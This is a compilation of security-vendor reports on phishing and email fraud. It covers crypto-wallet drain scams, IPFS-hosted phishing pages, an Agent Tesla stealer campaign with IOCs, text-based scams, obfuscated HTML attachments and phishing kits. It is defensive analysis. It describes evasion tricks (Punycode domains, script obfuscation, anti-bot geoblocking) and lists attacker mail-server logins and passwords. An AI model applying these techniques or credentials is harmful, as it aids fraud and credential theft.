The higher the global popularity of cryptocurrencies and the more new ways of storing them, the wider the arsenal of tools used by malicious actors who are after digital money. Scammers tailor the complexity of technology they use and the thoroughness of their efforts to imitate legitimate websites to how well the target is protected and how large the amount is that they can steal if successful. This story covers two fundamentally different methods of email attacks on the two most popular ways of storing cryptocurrency: hot and cold wallets.

Hot wallets and attempts at hacking them

A hot wallet is a cryptocurrency wallet with permanent access to the internet. This is essentially any online service that provides cryptocurrency storage, ranging from crypto exchanges to specialized apps.

Hot wallets are a highly popular crypto storage option. This can be explained by the simplicity of creating one (registering with a wallet service is all you need to do) and the ease of withdrawing and converting funds. The popularity and simplicity of hot wallets makes them cybercriminals’ main target. However, for this reason, and due to the fact that hot wallets are always online, they are rarely used for storing large amounts. Hence, cybercriminals have little motivation to invest heavily into phishing campaigns, and so, techniques used in email attacks on hot wallets are hardly ever original or complex. In fact, they look rather primitive and target mostly unsophisticated users.

A typical phishing scam aimed at a hot wallet user works as follows: hackers send email messages addressed as coming from a well-known crypto exchange and requesting the user to confirm a transaction or verify their wallet again.

Sample phishing email that targets Coinbase users

After the user clicks the link, they are redirected to a page where they are asked to enter their seed phrase. A seed phrase (recovery phrase) is a sequence of 12 (less commonly 24) words for recovering access to a crypto wallet. This is essentially the main password for the wallet. The seed phrase can be used for gaining or recovering access to the user’s account and making any transactions. The seed phrase cannot be changed or recovered: by misplacing it, the user risks losing access to their wallet for good, and by giving it to scammers, permanently compromising their account.

Seed phrase entry page

If the user enters the seed phrase on a fake web page, scammers get full access to the wallet and the ability to siphon all of the funds to their own addresses.

Fairly simple and devoid of software or social engineering tricks, scams like these typically target non-technical users. A seed phrase entry form usually has a stripped-down look: just an input field and a crypto exchange logo.

Phishing scams that target cold wallets

A cold wallet (cold storage) is a wallet without a permanent connection to the internet, like a dedicated device or even just a private key written on a slip of paper. Hardware storage is the most common type of cold wallets. As these devices are offline most of the time, and remote access is impossible, users tend to store significantly larger amounts on these. That said, it would be erroneous to believe that a hardware wallet cannot be compromised without stealing it, or at least, getting physical access to it. As is the case with hot wallets, scammers use social engineering techniques to get to users’ funds. We spotted an email campaign recently that was specifically aimed at the owners of hardware cold wallets.

This type of attack starts as a crypto email campaign: the user gets an email, addressed as being from the Ripple cryptocurrency exchange and offering to join a giveaway of XRP tokens, the platform’s internal cryptocurrency.

Phishing letter pretending to be from the Ripple cryptocurrency exchange

If the user clicks the link, they are presented with a blog page featuring a post that explains the rules of the “giveaway”. The post contains a direct link to “registration”.

Fake Ripple blog

Already at this point, the scam shows a few differences from mass attacks on hot wallets: instead of sending the user a link to a phishing page, the scammers used a more sophisticated immersion trick with a blog post. They also went so far as meticulously copying the design of the Ripple website and registering a domain name that was nearly identical to the exchange’s official domain. This is called a Punycode phishing attack. At first glance, the second-level domain is identical to the original one, but a closer look will reveal that the letter “r” has been replaced with a Unicode character that uses a cedilla:

https://app[.]xn--ipple-4bb[.]net -> https://app[.]ŗipple[.]net/

Also, the scam site is hosted in the .net top-level domain, rather than .com, where the official Ripple website is located. This may not raise any red flags with the victim, though, as both domains are widely used by legitimate organizations.

After the user follows the link from the “blog” to the fake Ripple page, they are offered to connect to the WebSocket address wss://s2.ripple.com.

Connection to the WebSocket address

Next, the user is offered to enter the address of their XRP account.

Entering XRP account address

The website then offers to choose an authentication method for receiving the bonus tokens.

Choosing an authentication method

As you can see, hardware wallets are top of the list and suggested by scammers. Selecting Trezor redirects the user to the official website trezor.io, which allows to connect devices to web apps via Trezor Connect API. The API is used for simplifying transactions with the help of a hardware wallet. The scammers want the victim to connect to their website, so they can withdraw the funds from the victim’s account.

When the user attempts to connect to the third-party website, Trezor Connect asks them to consent to anonymous collection of data and to confirm that they want to connect to the website. The address of the scam site is displayed in a Punycode view as: https://app[.]xn--ipple-4bb[.]net. The scammer’s hope is that the user misses the address, which is provided in small print on the side of the page.

Trezor Connect: confirming the connection to the scam site

Connection via Ledger is a lot like Trezor, but it uses the WebHID interface, with the other steps unchanged.

What happens after the user connects their hardware wallet? We had to explore the code of the phishing site just a bit to answer that question. The website is powered by an application written in Node.js. This uses two APIs:

• wss://s2.ripple.com, the official WebSocket address for Ripple transactions
• The phishing site API, for example: app[.]xn--ipple-4bb[.]net/api/v1/action

The scammers use these two APIs for interacting with the victim’s XRP account. The phishing site API talks to the WebSocket address, verifies account details and requests funds. For this purpose, the scammers spin up one-off intermediate wallets.

{
 "command": "get_payment"
 "account": victim_address,
 "transactionType": "Payment"
}

{
	"success": true,
	"data": {
    	"TransactionType": "Payment",
    	"Account": victim_address,
    	"Fee": "10",
    	"Sequence": 391,
    	"Destination": "rU53pnJzEv2mrtck…"*,
    	"Flags": 2147483648,
    	"Amount": "xxx",
    	"LastLedgerSequence": 79548458
	}
}

The intermediate account is used for just two things: to receive the victim’s funds and to forward these to the scammers’ permanent account. This helps to hide the final destination.

Statistics

In the spring of 2023, Kaspersky antispam solutions detected and blocked 85,362 scam emails targeting cryptocurrency users. Scam email campaigns peaked in March, with 34,644 messages. We blocked 19,902 emails in April and 30,816 in May.

Number of detected phishing emails targeting cryptocurrency users in March–May 2023 (download)

Conclusion

Scammers understand one thing just fine: the harder it is to get to the loot, the bigger it is likely to be. Therefore, attacks on hardware wallets, which many consider bullet-proof, use far more sophisticated tactics than those employed against the users of online crypto storage services. Although hardware wallets are indeed more secure than hot wallets, users should not lower their guard. Check every detail carefully before giving any website access to your wallet, and refuse to connect if anything smells fishy.

The idea of creating Web 3.0 has been around since the end of 2000s. The new version of the world wide web should repair the weak points of Web 2.0., some of which are: featureless content, prevalence of proprietary solutions, and lack of safety in a centralized user data storage environment, where a massive leak is likely should just one server be compromised. Web 3.0 is described as a decentralized and open internet — some of its features already implemented in today’s digital world.

Unfortunately, the “new internet” will still remain a playground for criminals who will employ cutting-edge technologies for their old sport of data theft, financial machinations and the like. In this article, I will dwell on how they use one of the WEB 3.0 technologies — the distributed file system IPFS — for email phishing attacks.

What is IPFS?

IPFS (InterPlanetary File System) is a peer-to-peer distributed file system enabling users around the world to exchange files. Unlike centralized systems, IPFS uses addressing performed according to unique content identifiers (CID), and not file paths. CID is generated based on the file’s hash value and then recorded to a distributed hash table, which also contains information on the file owner. The file itself resides on the computer of the user who had “uploaded” it to IPFS, and is downloaded directly from that computer. The structure of IPFS is somewhat similar to the BitTorrent protocol which, too, is a distributed network where file exchange takes place directly between the users’ devices.

By default, uploading a file to IPFS or downloading it requires special software (IPFS client). For users to view the files residing in IPFS freely without installing any software, the so-called gateways are provided. A gateway is in fact a server with access to IPFS. To open a file via a gateway, a URL is required normally containing a gateway address, reference to IPFS, and the file’s CID. URL formats can be quite different, for example:

• https://gateway_address/ipfs/CID
• https://CID.ipfs.gateway_address

Phishing and IPFS

In 2022, scammers began actively using IPFS for email phishing attacks. They would place HTML files containing a phishing form in IPFS and use gateways as proxies, so that victims could open the file, whether or not running an IPFS client on their devices. The scammers would include file access links via a gateway into phishing letters dispatched to would-be victims.

The use of a distributed file system allows attackers to cut back on phishing page hosting costs. Besides, you cannot delete files uploaded by third parties from IPFS. If somebody wants a file to disappear from the system completely, they can urge its owners to delete it, but the method will probably never work with cybercriminals anyway.

IPFS gateway providers attempt to combat IPFS phishing by regularly deleting links to fraudulent files.

Phishing page deletion notification

Yet detection and deletion of links at gateway level does not always happen as quickly as the blocking of a phishing website, cloud form, or document. We have observed URL addresses of IPFS files that first appeared in October 2022 and remain operational at the time of this writing.

Phishing letters containing IPFS links are hardly ever too original — they contain the typical phishing content the purpose of which is to obtain the victim’s account login and password.

Phishing letter with an IPFS link

It is a bit more interesting to examine the HTML pages the links lead to.

HTML page used for phishing

As can be seen on the screenshot above, the URL parameter contains the recipient’s e-mail address. Once it is modified, the page content will change too: the corporate logo on top of the phishing form and the email address entered into the login field. In this way, one link can be used in several phishing campaigns targeting different users — sometimes even in dozens of campaigns.

Phishing page modification

The logo replacement effect is achieved using a simple JavaScript code. The script obtains domain info from the page URL parameter and substitutes it into the URL of the Google resource, from which a logo icon is then sourced.

Company logo substitution

Use of IPFS in targeted phishing attacks

The use of IPFS is not limited to mass mailing campaigns: it is used for complex targeted attacks too. Unlike the ordinary ones, targeted phishing campaigns are much better prepared, normally focusing on specific persons within the company, not just random users.

Targeted phishing with an IPFS link

In the two examples above, the attacks were leveled at corporate procurement departments, the letters coming from sales managers of existing organizations. The phishing page itself lacks in originality.

Phishing page used in a targeted attack

Statistics

In late 2022, we were observing 2–15 thousand IPFS phishing letters a day for most of the time. But there were quieter days too. Thus, our systems registered only 637 such letters on December 1, and 937 on December 23. Starting this year, IPFS phishing began to grow in scale. We observed a few upsurges in January and February with over 24,000 letters a day — with peaks reaching 34–37 thousand/day. However, the flurry has died down little by little by mid-February, the number of attacks mostly returning to November and December levels.

Dynamics of the number of IPFS phishing attacks, November 2022 — February 2023 (download)

Yet it is worth noting that February turned out the busiest month in terms of IPFS phishing activity. In that month alone, we observed almost 400,000 letters — more than 20,000 above the January figure, and over 100,000 more than in November and December 2022.

IPFS phishing letters distribution by month, November 2022 — February 2023 (download)

Conclusion

Attackers have used and will continue to use cutting-edge technologies to reap profits. Of late, we observe an increase in the number of IPFS phishing attacks — both mass and targeted. The distributed file system allows scammers to save money on domain purchase. Plus, it is not easy to completely delete a file, although, there are attempts to combat fraud at IPFS gateway level. The good news is that anti-spam solutions detect and block links to phishing files in IPFS, just like any other phishing links. In particular, Kaspersky products employ a number of heuristics to detect IPFS phishing.

Most mass malicious mailing campaigns are very primitive and hardly diverse, with the content limited to several sentences offering the user to download archives that supposedly contain some urgent bills or unpaid fines. The email messages may contain no signatures or logos, with typos and other errors being fairly common. These mailings may target individual users or large corporations, with no significant differences in message content.

Example of a mass malicious mailing message

Things have started to change recently, though, as spammers began employing techniques that are typical of targeted attacks. In particular, they have been sending emails in the name of real companies, copying the senders’ writing style and signatures.

Customer email with an Easter egg inside

We discovered a noteworthy email message recently. In it, someone posing as a Malaysian prospect and using a fairly odd variety of English, asks the recipient to review some customer requirements and get back with the requested documents. The general format complies with the corporate correspondence standards: there is a logo that belongs to a real company and a signature that features sender details. Overall, the request looks legit, while the linguistic errors easily can be attributed to the sender being a non-native speaker.

The email from the “Malaysian prospect,” with a malicious attachment

The only thing about the email that smells fishy is the sender’s address (newsletter@trade***.com), as “newsletter” is typically used for news, not procurement. Besides, the sender’s domain name is different from the company name in the logo.

In another email, a purported Bulgarian customer inquires about the availability of some products and offers to discuss the details of a deal. The requested products list is said to be in the attachment, as in the previous specimen. The sender’s address, similarly suspicious, belongs to a Greek, not Bulgarian, domain, which apparently has no relation to the company whose name is used by the spammers.

The email from the “Bulgarian customer,” with a malicious attachment

What these two messages have in common is both the mailing scenario and the fact that neither looks generated by a machine. Looking closely at the message headers, we noticed that they shared a structure: a sequence of headers, MSGID format and email client were the same. Besides, the messages originated within a limited range of IP addresses. This suggested that they were part of one massive email campaign.

Comparing the message headers of two malicious emails

Unlike the IP addresses and headers, the content varies. The spammers have been sending malicious archives addressed from a large number of companies, with the “request” text changing as well. This suggests that the operators invested quite some effort into preparations, which is uncharacteristic of this kind of campaigns.

Statistics

From April till August, our systems detected 739,749 messages attributed to the campaign. The email activity peaked in June, with 194,100 detected messages, dropping to 178,510 in July and to 104,991 in August.

Malicious email dynamics, April through August 2022 (download)

Payload: Agent Tesla malware

We studied the contents of the archives attached to the emails, finding it to contain one of two unique files that belong to the same family. It is the widespread Agent Tesla malware, written in .NET and known since 2014. Its main objective is to fetch passwords stored in browsers and other applications, and forward these to the operator. While Agent Tesla most frequently forwards data via email, there are versions that drop the stolen data into a Telegram secret chat, on a website operated by the attackers or on an FTP server. The Agent Tesla version being spread by the campaign at hand is one the latest, capable of ripping password from the following applications.

• Browsers: Chrome, Edge, Firefox, Opera, 360 Browser, 7Star, Amigo, Brave, CentBrowser, Chedot, Chromium, Citrio, Cốc Cốc, Comodo Dragon, CoolNovo, Coowon, Elements Browser, Epic Privacy, Iridium Browser, Kometa, Liebao Browser, Orbitum, QIP Surf, Sleipnir 6, Sputnik, Torch Browser, Uran, Vivaldi, Yandex.Browser, QQ Browser, Cyberfox, IceDragon, Pale Moon, SeaMonkey, Waterfox, IceCat, K-Meleon.
• Email clients: Becky!, Opera Mail, Foxmail, Thunderbird, Claws, Outlook, The Bat!, eM Client, Mailbird, IncrediMail, Postbox, Pocomail
• FTP/SCP clients: WinSCP, WS_FTP, FTPGetter, SmartFTP, FTP Navigator, Core FTP
• Databases: MySQL Workbench
• Virtual network computing clients: RealVNC, TightVNC, TigerVNC, UltraVNC, Windows RDP, cFTP
• VPN clients: NordVPN, OpenVPN
• Instant messaging programs: Psi/Psi+, Trillian

Agenta Tesla is also capable of making screenshots, intercepting clipboard contents and logging keystrokes.

Agent Tesla attack geography

Agent Tesla targets users around the world. According to our observations, the malware’s activity from May till August 2022 was the highest in Europe, Asia and Latin America. The largest number of victims (20,941) was recorded in Mexico. It was followed by Spain, with 18,090 users’ devices registering infection attempts, and Germany, where 14,880 users were affected.

Ten most-attacked counties by number of affected users:

Conclusion

The spam campaign we discovered is clear proof that cybercriminals can invest significant effort even in mass attacks. The email messages we studied appear to be high-quality imitations of business inquiries by real companies, only given away by the inappropriate sender addresses. In all likelihood, these emails were composed and sent out manually. That said, our systems were detecting more than a hundred thousand of these emails each month, which targeted organizations all around the world.

The payload spread by the attackers is capable of stealing login data from an imposing number of applications. The data may be offered for sale on darkweb forums or used in targeted attacks against organizations. Agent Tesla is notably a long-known stealer, detected by most cybersecurity products. It is assigned the verdict Trojan-PSW.MSIL.Agensla by Kaspersky products.

Indicators of compromise

MD5 hashes of attached archives:

ddc607bb993b94c543c63808bebf682a
862adb87b0b894d450f8914a353e3e9c
a1ae8b0d794af648908e0345204ea192
9d0364e1f625edb286b0d5541bb15357
eee70de3ac0dc902b99ed33408e646c9

MD5 hashes of the executables and details of attackers’ email accounts used for sending and receiving data stolen by the sample:

64011a7871abb873c822b8b99082e8ab
Mail from: info(a)essentialapparatus.co.ke
Password: Info@2018
Mail to: sales1.nuozhongsteel(a)gmail.com
Mail server: mail.essentialapparatus.co.ke:587

b012cb8cfee0062632817d12d43f98b4
Mail from: quality(a)keeprojects.in
Password: quality#@!
Mail to: quality(a)keeprojects.in
Mail server: mail.keeprojects.in:587

E-mail scammers typically combine social engineering with technical skills to bypass spam filters and persuade the recipient to reply. But there is a specific class of attacks that is technically stuck somewhere in the late 90s/early 00s, in the era of CRT monitors and sluggish internet: we are talking about text-based fraud. Attackers of this kind do not carefully imitate the appearance of e-mails from major companies, do not redirect the victim to a fake site, do not obfuscate links and do not even use them. Their main tool and method of persuasion is old-fashioned text. And it works surprisingly often.

Types of text-based fraud

In terms of topics and techniques, text-based fraud can be divided into several types:

• Dating scams
• 419 scams
• Blackmailing and extortion
• Vishing

Let’s take a look at these types of scams and see why they work.

Dating scams

This category includes messages seemingly from attractive women (more rarely men) looking for a “serious relationship.” For extra plausibility, scammers add biographical details and/or photographs of their bait, including immodest ones. The latter are usually downloaded from open sources.

Example of a dating scam e-mail

Attackers can also create fake profiles in social networks and instant messengers to make the scheme more persuasive. If the potential victim responds, they are added as friends and start to receive individual treatment. The interaction can last from several days to several months, and includes not only messages, but also phone and even video calls.

Fraudsters can monetize their lonely-heart character in several ways. For instance, early on in the communication, they might ask for small amounts of money or gifts as a sign of commitment. Another variant is, after a long virtual communication, to ask for a large sum to visit the victim, have an urgent surgery, etc. One more scheme, quite common lately, is when the “partner” promises to send the victim an expensive gift or cash by courier from abroad. After some time, the “courier” gets in touch and asks the victim to pay for shipping, customs duties, etc.

Note that scammers get acquainted with victims not only by e-mail. These schemes are utilized on dating sites, social networks and instant messengers. Moreover, the latter two are often the main channel for communicating with the victim, regardless of how contact was initially made. But mass mailings are still more convenient to send out by e-mail, since accounts in social networks, messengers, etc., are quickly blocked due to spam.

Statistics

Dating scams are the least common type of message-based fraud. From March to June 2022, we found 49,536 messages from people “looking for a relationship,” dropping to 1998 e-mails for the whole June. This may be because scammers actively use other communication channels to get to know their victims and establish a trusting relationship.

Number of detected messages offering to date, March–June 2022 (download)

419 scams: “rich uncles” and Covid payments

419 scams are one of the oldest types of text-based fraud. In the classic 419 letter, the recipient is informed by a “lawyer” or other “official” that a deceased relative or dying benefactor has bequeathed a huge fortune to them. All the victim needs to do is fill out a short questionnaire, pay a fee for administration and other formalities, and claim their millions. Often, the scammers do not mention the fee straight up but invite the victim to make contact by replying to the e-mail to find out more about their “inheritance.” In any case, once the fee is paid, they vanish.

419 e-mails are often crawling with grammar and spelling mistakes. This may be to mask words and expressions that could activate spam filters, or it could be that the attackers have a poor grasp of the victim’s language.

Classical 419 scam with inheritance

419 letters are still popular with attackers, who send them regularly and in large numbers: our solutions detect hundreds of thousands of such messages every month. Often instead of deceased rich relatives they exploit more relevant topics. For example, alongside with the increased attention to the Syrian war, cybercriminals were sending e-mails supposedly from people inside the country wanting to transfer large sums abroad.

419 scam with transactions

Lately, unexpected transactions have been doing the rounds, as well as payments to victims — of Covid, the Ukraine crisis and, ironically, frauds.

419 scam with compensation

Another subspecies of the 419 scam is lottery winnings in which the “winner” did not participate. To make the scheme more credible, scammers usually claim that, say, a giveaway was held for taxpayers in a particular region or country, for owners of a particular e-mail domain, etc. Unlike Covid-19 compensation, such mailings are not new but they never lose popularity.

Lottery fraud

From a technical standpoint, not much has changed in the 419 scam — for the most part, messages are sent from free webmail accounts (Google Mail, Yahoo Mail, etc.).

To ask for details, send a form, etc., attackers usually encourage victims to contact them by mail. As soon as mail services can block addresses known as spam sources, they often give a different address for replies, one that is not flagged.

Statistics

From February to June, our solutions detected 1.8 million 419 scam e-mails. Their number began to rise in late February, peaking at 657,014 in March. In April, on the contrary, spammer activity decreased by more than half.

Number of 419 e-mails detected, February–June 2022 (download)

Blackmail scam

Whereas scammers use the above methods to exploit victims’ greed, blackmailers play on their fear. Typically, cybercriminals claim that they have come into possession of the target’s personal information, which, for a modest payment, they promise not to send to family members or post online. As a rule, they do not provide any actual evidence of data theft, since they did not in fact steal anything — this is how scammers differ from ransomware groups, which do indeed steal or encrypt files using malware.

Blackmail scams really came into their own with the popularization of cryptocurrencies: the blockchain’s anonymity eliminates the need for complex money-laundering chains.

Extortion e-mail: the scammer claims to have hacked into the recipient’s mailbox

Extortionists attack both individuals and companies but employ different approaches. Individuals are most often threatened with publication of personal data allegedly stolen by hacking into their computer or mailbox. Scammers might also mention intimate photos or videos that they claim to have recorded through the device’s webcam. It’s quite possible they pinched this idea from the episode of Black Mirror.

Extortion e-mail threatening to post “intimate” content allegedly stolen from the user and containing their e-mail address in the From header

From a technical point of view, this type of fraud typically features e-mail address spoofing. Attackers substitute the recipient’s address in the From header, seemingly confirming mailbox hacking.

E-mails targeting individuals may also threaten administrative or criminal penalties, although such messages are far less common than ones about hacking.

Companies, meanwhile, can be threatened with bomb scare messages. In 2020 and 2021, extortionists actively sent out e-mails in the name of renowned APT and ransomware groups, promising to carry out an attack unless payment was forthwith. Unlike the majority of promises, attackers sometimes implement this one.

Statistics

There are significantly more extortion e-mails in mail traffic than other forms of text-based scam. For instance, from March to June, we detected more than 12 million blackmail messages.

Number of extortionate e-mails detected, March–June 2022 (download)

Vishing: scammers’ hotline

Vishing is short for voice phishing. As you might guess from the name, this is when attackers make contact with the potential victim via voice communication. How does this relate to text-based scams? In the past few years, vishers have been sending out mass e-mails asking the recipient to call back on their phone number, that is, spamming is the first step of the operation.

Vishing can target both individuals and companies. From the former, scammers try to extract confidential data, persuade them to install software for remote access, or to transfer money to the scammers’ account. And as for the target company employee, attackers can convince them to transfer money to a specific bank account or grant access to a corporate account.

Fake PayPal notification about a large purchase. To cancel the order, the victim is asked to urgently write or call the support service

Most often, vishing e-mails masquerade as notifications from some service: this can be a large online store, a payment system, or, for example, subscription-based software.

Fake Geek Squad notification. For more information, the victim is asked to call the specified number

Typically, the e-mails are composed so as to create the impression of being generated automatically. Most likely, this is so that the victim does not try to reply to the message but uses the vishers’ contact details.

To find out exactly how attackers achieve their goal, that is, to fish (or vish) out data or money, I called a couple of numbers provided in such e-mails. In both cases, after a short introductory dialog, a confident voice at the other end asked me to open a browser window and spelled out a URL (anydesk.com) for me to download the Anydesk remote access program. In response to my question about such a long unsubscribing process, the first scammer, absolutely unfazed, replied that they needed to log in to my bank account to confirm and then cancel the transaction. When I replied that I did not use online banking, the scammer hung up. The second turned out to be less talkative and did not give any interesting details.

On the one hand, this scheme seems too clunky to be widely used. On the other, communication via various channels and the attackers’ imitation of expertise can inspire more trust in the user than just an e-mail with a phishing link.

Statistics

From March to June 2022, we found 347,141 e-mails prompting the recipient to call the scammers back by phone. We saw a slight drop in this type of scam in April, after which the number of e-mails began to grow again.

Number of detected vishing e-mails, March–June 2022 (download)

Conclusion

Despite the existence of instant messengers, social networks and video chats, cybercriminals continue to use e-mail as the first point of contact with the victim, even if they switch to other channels afterwards. It is mainly the topics of the e-mails that change: attackers actively exploit current events to attract the potential victims’ attention. This suggests that despite users’ general awareness of cybercriminals’ basic methods, techniques such as intimidation and the promise of a free lunch, coupled with a willingness to spend time building trust, continue to reap rewards. The aim of these e-mails is to knock the user off balance and get them to act without thinking. Therefore, it is important not only to be aware of intruders’ techniques, but to make it a habit to respond to e-mails in a calm state of mind — or not to respond at all.

On the ISP side, solutions that employ machine learning and heuristics to recognize fraudulent e-mails can help filter out such spam.

The use of embedded HTML documents in phishing e-mails is a standard technique employed by cybercriminals. It does away with the need to put links in the e-mail body, which antispam engines and e-mail antiviruses usually detect with ease. HTML offers more possibilities than e-mail for camouflaging phishing content.

There are two main types of HTML attachments that cybercriminals use: HTML files with a link to a fake website or a full-fledged phishing page. In the first case, the attackers can not only hide a link in the file, but also automatically redirect the user to the fraudulent site when they open this file. The second type of HTML attachment makes it possible to skip creating the website altogether and save on hosting costs: the phishing form and the script that harvests the data are embedded directly in the attachment. In addition, an HTML file, like an e-mail, can be modified according to the intended victim and attack vector, allowing for more personalized phishing content.

Fig.1. Example e-mail with an HTML attachment

Structure of phishing HTML attachments

Phishing elements in HTML attachments are usually implemented using JavaScript, which handles redirecting the user to a phishing site or collecting and sending credentials to scammers.

Fig. 2. Phishing HTML page and its source code

Typically, the HTML page sends data to a malicious URL specified in the script. Some attachments consist entirely (or mostly) of a JS script.

In the e-mail source code, the HTML attachment looks like plain text, usually Base64-encoded.

Fig. 3. HTML attachment in e-mail source code

If a file contains malicious scripts or links in plaintext, the security software can quickly parse and block it. To avoid this, cybercriminals resort to various tricks.

JavaScript obfuscation

JavaScript obfuscation is one of the most common techniques used to disguise HTML attachments. To prevent the URL in the file from being quickly spotted and blocked, phishers obfuscate either the phishing link itself or the entire script, and sometimes the whole HTML file. In some cases, cybercriminals obfuscate the code manually, but often they use ready-made tools, of which many are freely available, such as JavaScript Obfuscator.

For example, opening the HTML attachment in the phishing e-mail supposedly from HSBC Bank (see Fig. 1) in a text editor, we see some pretty confusing JS code, which, it would seem, hints neither at opening a link nor at any other meaningful action.

Fig. 4. Example of obfuscation in an HTML attachment

However, it actually is an obfuscated script that redirects the user to a phishing site. To disguise the phishing link, the attackers used a ready-made tool, allowing us to easily deobfuscate the script.

Fig. 5. Deobfuscated script from an attachment in an e-mail seemingly from HSBC Bank: link for redirecting the user

If a script, link, or HTML page is obfuscated manually, it is much harder to restore the original code. To detect phishing content in such a file, dynamic analysis may be required, which involves running and debugging the code.

Encoding

Sometimes attackers use more interesting methods. In one phishing e-mail, for instance, we found an unusual HTML attachment. As in the example above, it contained JavaScript. Because the code was so compact, one might think it was doing the same as the code in the fake HSBC e-mail — that is, redirecting the user to a phishing site. But upon running it, we found a full-fledged phishing page encoded in this small script.

Fig. 6. HTML file using the unescape() method — the source code of the file contains only five lines, one of which is empty

Fig. 7. Phishing page in the HTML attachment

The cybercriminals used an interesting trick that involves the deprecated JS method unescape(). This method substitutes the “%xx” character sequences with their ASCII equivalents in the string that is passed to it. Running the script and viewing the source code of the resulting page, we see plain HTML.

Fig. 8. The resulting HTML file

Instead of unescape(), JavaScript now uses the decodeURI() and decodeURIComponent() methods, yet most modern browsers still support unescape(). We cannot say for sure why the attackers chose a deprecated method, but it could be because modern methods are more likely to be interpreted and detected by antispam engines.

Statistics

In the first four months of 2022, Kaspersky security solutions detected nearly 2 million e-mails containing malicious HTML attachments. Nearly half of them (851,328) were detected and blocked in March. January was the calmest month, with our antispam solutions detecting 299,859 e-mails with phishing HTML attachments.

Number of detected e-mails with malicious HTML attachments, January–April 2022 (download)

Conclusion

Phishers deploy a variety of tricks to bypass e-mail blocking and lure as many users as possible to their fraudulent sites. A common technique is HTML attachments with partially or fully obfuscated code. HTML files allow attackers to use scripts, obfuscate malicious content to make it harder to detect, and send phishing pages as attachments instead of links.

Kaspersky security solutions detect HTML attachments containing scripts regardless of obfuscation.

What are phishing kits?

One of the most common tricks scammers use in phishing attacks is to create a fake official page of a famous brand. Attackers tend to copy design elements from the real website, which is why users can find it hard to distinguish the fake pages from the official ones. Even phishing page domain name can often look like the real web address of a certain brand, as cybercriminals include the name of the company or service they are posing as in the URL. This trick is known as combosquatting.

Combosquatting: registering a fake website with a domain name which contains “facebook.com”

Given phishing websites can be efficiently blocked or added to anti-phishing databases, cybercriminals have to generate these pages quickly and in large numbers. Creating them from scratch over and over again is time-consuming, and not all cybercriminals have the web-development and administration skills it takes. That is why cybercriminals favor phishing kits, which are like model aircraft or vehicle assembly kits. They consist of ready-made templates and scripts which can be used to create phishing pages quickly and on a massive scale. Phishing kits are fairly easy to use, which is why even inexperienced attackers who do not have any technical skills can get their heads around them.

Cybercriminals tend to use hacked official websites to host pages generated using the phishing kits or rely on companies which offer free web-hosting providers. The latter are constantly working to combat phishing and block the fake pages, although phishing websites often manage to serve the intended purpose within their short period of activity, which is to collect and send personal data of victims to criminals.

Contents of phishing kits: basic and complex phishing kits

Phishing kits are ready-to-deploy packages which require the bare minimum effort to use. Moreover, their developers usually provide instructions with their products for inexperienced attackers. Phishing kits usually are designed to generate copies of websites representing famous brands with large audiences. After all, the more potential victims there are, the more money there is to be stolen. The phishing kits we detected in 2021 most frequently created copies of Facebook, the Dutch banking group ING, the German bank Sparkasse, as well as Adidas and Amazon.

The most basic option phishing kits offer is a ready-made phishing page which is fairly simple to upload on a web-hosting service.

Contents of simple phishing-kit archive

These phishing kits have two essential components for practical reasons:

1. An HTML page with a phishing data-entry form and related content (style, images, scripts and other multimedia components). Attackers aim to make the page look identical to pages on the company’s official website whose users they want to target in the attack. However, the fake page’s HTML code differs from the original code.
2. The phishing script that sends data victims enter on the fake page to cybercriminals. It is usually a simple script which parses the phishing data-entry form. In the phishing script’s code, cybercriminals also indicate the Telegram bot authentication token, e-mail address or other third-party online resources where stolen data will be sent using the phishing kit. The phishing kit’s creators often comment the line where an address or token needs to be entered.

Telegram bot token in a phishing kit’s code

Instead of providing ready-to-load pages, more sophisticated phishing kits contain their elements (images, forms, phishing script, text fragments etc.), along with a separate script which creates new pages from these elements.

Contents of a phishing-kit archive: phishing pages created automatically when index.php file is run

There are also advanced phishing packages which not only come with all the tools and elements needed to assemble the web pages, but also include a control center with a user interface. Attackers can use this control center to tailor how a phishing page functions, e.g., by specifying how they would like to receive stolen data. Some sophisticated phishing kits allow to generate pages which target users from different countries using a built-in dictionary containing the same phrases in different languages.

Dictionary from an advanced phishing kit

In addition to tools for attackers to create phishing pages themselves, some phishing kits can include scripts for sending out messages to potential victims via popular messaging apps or e-mail which contain links to phishing pages. These mailings tend to be the go-to channel cybercriminals use to get their pages out there. The contact details of potential victims can be found on the dark web, where a colossal amount of databases are sold which detail clients of various companies and services.

Many of the scripts for sending out messages included in phishing kits or sold separately can add a URL parameter in the links which contains the recipient’s e-mail address. This parameter is used extensively in corporate phishing attacks. Some known phishing kits which target the corporate sector are able to capture the e-mail domain located in the URL parameter and generate a phishing page tailored to this domain name. There are several common ways to deploy this dynamic content generation:

• The text on the page adapts to the domain name, which makes it look more personalized to increase the victim’s trust.
• Icons are loaded from the Internet which are related to the victim’s domain name, where the domain itself is essentially the key word used in a search request to load icons.

  

  Code with the URL of a loaded icon corresponding to the victim’s domain

  

  

  User-Related Dynamic Content: content from phishing website along with text and an icon loaded using the domain name in the URL

• Legal iFrame Background: based on the e-mail domain, an iFrame opens with the legitimate website in the background and a phishing entry form imposed on top of it.

  

  iFrame with legitimate website as the background

Anti-detection methods

Some sophisticated phishing kits include functional elements which prevent a page from being accessed by unwelcome agents, such as bots used by known anti-phishing solution developers or search engines. The latter are unwelcome, because if a phishing page ends up being a search-result hit, there’s a high risk it’ll soon get blocked.

Contents of sophisticated phishing-kit archive with bot detection

Apart from that, some of the phishing kits we detected used geoblocking. For example, phishing attacks written in Japanese had pages which could only be opened from Japanese IP addresses. Blocking tended to be triggered by the detection of the User Agent string, which identifies the user’s browser, or based on their IP address, although there are also some technologies which analyze request headers. This was all done in order to reduce the risk of detection by bots from the developers of anti-phishing solutions scanning the phishing page, and to avoid ending up in anti-phishing databases.

Some phishing kits add various obfuscation options for the generated pages and pure “junk” code which aims to make it harder for anti-phishing solutions to detect and block these pages. Some tricks worth highlighting include:

• Caesar cipher. Every character in the text is replaced by a character which is a fixed number of positions further along in the alphabet. This results in the text in the original code of the phishing page looking like alphabet soup, but when the page is loaded the shift reverts back and the user sees the page with normal decoded text. The script for implementing Caesar code is written by the creators of the phishing kits themselves.

  

  Code of a page with text encrypted in Caesar code

• Page source encoding. Text or even the page’s entire HTML code is encoded using an algorithm such as base64 or AES and decoded on the browser’s end. Unlike Caesar code, the algorithms for decoding and decrypting data in the phishing kit’s code are implemented using standard libraries.
